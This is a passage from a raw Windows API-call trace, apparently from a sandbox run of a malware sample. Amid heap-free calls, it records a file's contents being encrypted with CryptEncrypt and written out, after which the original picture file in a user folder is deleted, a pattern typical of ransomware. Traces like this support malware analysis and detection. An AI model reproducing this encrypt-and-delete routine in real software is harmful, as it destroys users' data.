lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0089.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0089.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0089.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0089.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0089.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0089.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0089.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0089.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0089.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0089.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0089.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0089.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0089.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0089.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0089.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796e48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0089.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0089.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0089.870] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0089.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0089.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0089.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0089.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0089.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0089.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0089.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0089.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0089.871] CryptGetKeyParam (in: hKey=0x41ac200, dwParam=0x7, pbData=0x43e2690, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2690*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0089.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0089.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0089.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0089.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0089.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0089.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0089.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0089.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0089.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0089.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0089.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0089.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0089.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0089.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0089.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0089.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0089.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0089.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0089.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0089.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0089.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0089.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0089.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0089.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0089.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0089.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0089.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0089.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0089.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0089.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0089.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0089.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0089.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0089.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0089.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0089.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0089.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0089.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0089.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0089.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0089.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0089.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0089.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0089.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0089.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0089.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0089.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0089.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0089.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0089.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0089.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0089.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0089.873] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0089.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0089.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0089.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0089.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0089.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0089.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0089.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0089.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0089.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0089.874] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0089.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0089.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0089.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0089.874] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0089.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0089.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0089.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0089.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0089.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0089.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0089.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0089.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0089.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0089.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0089.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0089.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0089.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0089.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0089.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0089.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0089.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0089.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0089.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0089.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0089.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0089.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0089.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0089.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0089.875] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0089.875] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0089.875] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0089.875] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0089.875] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0089.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0089.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca4d8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0089.876] CryptEncrypt (in: hKey=0x41ac200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x3a40, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x3a50) returned 1 [0089.876] CharLowerBuffW (in: lpsz="byte[14929]", cchLength=0xb | out: lpsz="byte[14929]") returned 0xb [0089.876] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0089.876] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0089.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0089.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca7d8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0089.876] CryptEncrypt (in: hKey=0x41ac200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4520ee8*, pdwDataLen=0x144e790*=0x3a40, dwBufLen=0x3a50 | out: pbData=0x4520ee8*, pdwDataLen=0x144e790*=0x3a50) returned 1 [0089.877] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0089.877] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0089.877] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0089.877] WriteFile (in: hFile=0x298, lpBuffer=0x4519a68*, nNumberOfBytesToWrite=0x3a50, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x4519a68*, lpNumberOfBytesWritten=0x144f194*=0x3a50, lpOverlapped=0x0) returned 1 [0089.928] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0089.928] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0089.928] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0089.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0089.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca250, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0089.928] CryptDestroyKey (hKey=0x41ac200) returned 1 [0089.928] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0089.928] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0089.928] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0089.928] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0089.928] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0089.975] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0089.975] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0089.975] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0089.975] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0089.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0089.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796fe8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0089.975] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0089.975] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0089.975] FreeLibrary (hLibModule=0x756e0000) returned 1 [0089.975] CloseHandle (hObject=0x258) returned 1 [0089.976] CloseHandle (hObject=0x298) returned 1 [0089.977] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\qBLfci.gif", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\qBLfci.gif", lpFilePart=0x0) returned 0x23 [0089.977] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a138 [0089.978] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\qBLfci.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\qblfci.gif")) returned 0x20 [0089.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0089.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0089.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0089.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0089.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0089.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0089.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0089.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0089.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0089.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0089.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a3a0 [0089.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0089.978] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c08 [0089.978] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\qBLfci.gif", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22963900, ftCreationTime.dwHighDateTime=0x1d5eadd, ftLastAccessTime.dwLowDateTime=0x64985a50, ftLastAccessTime.dwHighDateTime=0x1d5eb68, ftLastWriteTime.dwLowDateTime=0x64985a50, ftLastWriteTime.dwHighDateTime=0x1d5eb68, nFileSizeHigh=0x0, nFileSizeLow=0x3a40, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="qBLfci.gif", cAlternateFileName="")) returned 0x41ac600 [0089.979] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\qBLfci.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\qblfci.gif")) returned 1 [0090.024] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22963900, ftCreationTime.dwHighDateTime=0x1d5eadd, ftLastAccessTime.dwLowDateTime=0x64985a50, ftLastAccessTime.dwHighDateTime=0x1d5eb68, ftLastWriteTime.dwLowDateTime=0x64985a50, ftLastWriteTime.dwHighDateTime=0x1d5eb68, nFileSizeHigh=0x0, nFileSizeLow=0x3a40, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="qBLfci.gif", cAlternateFileName="")) returned 0 [0090.024] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0090.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c08 | out: hHeap=0x1780000) returned 1 [0090.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0090.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0090.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0090.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a138 | out: hHeap=0x1780000) returned 1 [0090.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0090.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0090.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0090.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf770 | out: hHeap=0x1780000) returned 1 [0090.024] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0090.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0090.025] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0090.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0090.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0090.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0090.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0090.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0090.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0090.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: 